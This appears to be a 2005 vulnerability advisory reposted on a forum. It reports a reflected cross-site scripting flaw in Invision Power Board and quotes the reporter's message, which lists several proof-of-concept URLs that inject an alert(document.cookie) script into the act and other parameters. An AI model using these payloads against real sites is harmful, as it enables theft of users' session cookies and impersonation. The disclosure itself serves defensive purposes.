A demonstration exploit URL is provided:

http://[target]/index.php?act='><script>alert(document.cookie)</script>

Internet Explorer users are affected. Some other browsers do not execute the resulting HTML.

Other parameters are also affected.

Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Invision Power Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:  No solution was available at the time of this entry.

Vendor URL:  www.invisionboard.com/ (Links to External Site)

Cause:  Input validation error

Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Reported By:  "arron ward" <deadlink@elitemail.org>

Message History:  None.


  Source Message Contents

Date:  Fri, 29 Apr 2005 08:47:37 -0700
From:  "arron ward" <deadlink@elitemail.org>
Subject:  Invision Xss reveals Cookie and session details


Invision Xss reveals Cookie and session details

by adding = to a script input , on any page can reveal logged in user
cookie and session details including hashes... details below

note:you must be a member for this to work !!

Vendor:http://www.invisionboard.com/

Notified = Yes

29/4/2005

Tested on

IPB 2.0.3
IPB 2.1 Alpha 2

not tested on other versions but i expect they will be vuln also


Tested this on IPB main website forum and it is fully working

also notifed IPB Admin via Private Message

Details:

here is the scripts this will work on various pages for instance : using
IE

Example visit:

http://forums.invisi...m/index.php?act

Now by adding an a equal = and script messsage , in this case to reveal
cookies and session path details including user hash ...

='><script>alert(document.cookie)</script>

so XSS full url is :

http://forums.invisi...hp?...</script>




again this will work on multipule urls...examples follow

/forum/index.php?act=Members='><script>alert(document.cookie)</script>
/forum/index.php?act='><script>alert(document.cookie)</script>
/forum/index.php?act=calendar='><script>alert(document.cookie)</script>
/forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</script>



and so on...

regards

ComSec

co/Admin

http://www.governmen...urity.org/forum

--
btw my name is NOT arron ward...

Attached Thumbnails

  • 11.jpg

  • PobrecedPrite likes this